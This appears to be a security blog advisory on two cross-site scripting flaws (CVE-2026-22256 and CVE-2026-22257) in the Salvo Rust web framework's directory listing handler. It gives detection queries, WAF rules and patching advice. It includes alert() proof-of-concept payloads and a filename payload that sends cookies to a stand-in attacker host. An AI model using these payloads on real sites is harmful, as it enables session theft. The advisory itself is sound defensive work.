CVE-2026-22256 & CVE-2026-22257: Multiple High-Risk XSS Flaws Identified in Salvo Framework

Aegiron 9 mins0

Product: Salvo (Rust Web Framework)
Vulnerability Type: Cross-Site Scripting (XSS)
Affected Component: list_html directory listing handler
Impact: Client-side code execution, session compromise, account takeover, cross-user attacks

CVE-2026-22256 — Reflected Cross-Site Scripting (XSS)

Overview

CVE-2026-22256 is a reflected XSS vulnerability in the Salvo web framework. It occurs when the framework generates HTML directory listings and directly embeds parts of the incoming HTTP request path into the HTML response without safely escaping it.

Because the request path is fully attacker-controlled, a malicious user can inject JavaScript or HTML into a crafted URL. When a victim opens that link, the injected script executes in the victim’s browser under the context of the affected website.

CVSS Score

8.8 (High)

Severity

High

Exploitability Summary

  • Attack vector: Remote (network-based)
  • Attack complexity: Low
  • Privileges required: None
  • User interaction: Required (victim must click a crafted link)
  • Impact: Session hijacking, credential theft, unauthorized actions

How the Vulnerability Works

Salvo’s list_html function generates directory listings for file paths. During this process:

  • The current request path is decoded and normalized
  • That decoded value is embedded into the HTML output
  • No output encoding or HTML escaping is applied

If the request path contains HTML or JavaScript payloads, they are reflected verbatim into the rendered page.

The browser treats the injected content as trusted site content, allowing the script to execute.

Example Exploitation Flow (Educational)

  1. Attacker crafts a URL containing encoded JavaScript in the path: /files/%3Cscript%3Ealert(document.cookie)%3C/script%3E
  2. Victim clicks the link (email, chat, forum, etc.)
  3. Salvo renders the directory listing page
  4. The injected script executes in the victim’s browser

This can be extended to steal cookies, manipulate page content, or silently perform authenticated actions.

Proof of Concept (Educational Only)

A basic reflected XSS payload:

<script>alert('XSS')</script>

Encoded for URL use:

%3Cscript%3Ealert('XSS')%3C/script%3E

This is not a weaponized exploit, but demonstrates impact clearly.

MITRE Mapping

  • CWE-79: Improper Neutralization of Input During Web Page Generation (XSS)
  • ATT&CK Context: Exploit Public-Facing Application

Detection & Monitoring

Relevant Log Sources

  • Web server access logs (URI paths)
  • Reverse proxy / load balancer logs
  • Application request logs
  • WAF logs
  • Browser error telemetry (if collected server-side)

Indicators of Exploitation

Look for:

  • URL paths containing encoded or decoded HTML characters:
    • %3C, %3E, <, >
  • JavaScript keywords in request paths:
    • script, onerror, onload, javascript:
  • Unusual request paths leading to directory listing endpoints

Example Detection Queries

Search in access logs for:

%3Cscript
<script
onerror=
onload=
javascript:

Example IDS / WAF Rule

IF request.uri CONTAINS "<script" OR "%3Cscript"
THEN alert "Possible reflected XSS attempt against Salvo"

This rule should be tuned to reduce false positives.

CVE-2026-22257 — Stored Cross-Site Scripting (XSS)

Overview

CVE-2026-22257 is a stored (persistent) XSS vulnerability affecting the same list_html functionality. Instead of the request path, the attack vector is file and directory names.

If an attacker can upload or create files with specially crafted names, those names are later rendered into the HTML directory listing without sanitization. Any user who views the listing will trigger the payload.

CVSS Score

8.8 (High)

Severity

High

Exploitability Summary

  • Attack vector: Remote
  • Attack complexity: Low
  • Privileges required: None (if uploads are public)
  • User interaction: Viewing the directory listing
  • Impact: Cross-user compromise, persistent session theft

How the Vulnerability Works

When Salvo renders directory listings:

  • File and folder names are retrieved from disk
  • Names are injected directly into HTML output
  • No HTML escaping is performed

An attacker uploads a file with a malicious filename. That filename becomes executable content in the browser of anyone who views the directory.

This makes it more dangerous than reflected XSS because:

  • The payload persists
  • Multiple users can be affected
  • No attacker interaction is required after upload

Example Exploitation Flow (Educational)

  1. Attacker uploads a file named: "><script>fetch('https://attacker.site/?c='+document.cookie)</script>.txt
  2. Application stores the file normally
  3. A legitimate user visits the directory listing
  4. The browser executes the embedded script automatically

Proof of Concept (Educational Only)

Filename payload:

"><script>alert('Stored XSS')</script>

Encoded versions may also be used to bypass upload filters.

MITRE Mapping

  • CWE-79: Improper Neutralization of Input During Web Page Generation
  • ATT&CK Context: Exploit Public-Facing Application

Detection & Monitoring

Relevant Log Sources

  • File upload logs
  • Storage metadata (filenames)
  • Application logs for directory listing requests
  • Web server logs
  • WAF logs

Indicators of Stored XSS

  • Filenames containing:
    • <, >
    • %3C, %3E
    • script, svg, img
    • Event handlers (onerror, onload)
  • Repeated access to directory listing pages following uploads
  • Browser-side script execution originating from listing pages

Example Filename Detection Rule

IF uploaded_filename MATCHES /(<|%3C).*(script|svg|img)/i
THEN flag as potential stored XSS

Impact Summary (Both CVEs)

If successfully exploited, attackers may:

  • Steal session cookies
  • Perform actions as logged-in users
  • Deface pages
  • Inject malicious redirects
  • Launch follow-up attacks such as phishing or malware delivery

Mitigation & Remediation

Primary Fix

Upgrade Salvo to version 0.88.1 or later

Official patch / upgrade link:

https://github.com/salvo-rs/salvo/releases/tag/v0.88.1

Additional Defensive Measures

  • Disable directory listing if not required
  • Restrict file upload permissions
  • Enforce filename validation and normalization
  • Apply strict output encoding when rendering user-controlled content
  • Deploy a Content Security Policy (CSP) to reduce script execution impact
  • Use WAF rules to block encoded HTML in URLs and filenames

Final Takeaway

  • These vulnerabilities are easy to exploit once discovered
  • Absence of public exploit code does not mean low risk
  • Stored XSS should be treated as critical in multi-user environments
  • Patch deployment should be prioritized for all internet-facing services

Aegiron

Backed by 11+ years in cybersecurity and incident response, we decode the latest threats shaping today’s digital battlefield. This blog cuts through the noise with clear insights on vulnerabilities, emerging exploits, and the cyber news defenders can’t afford to miss.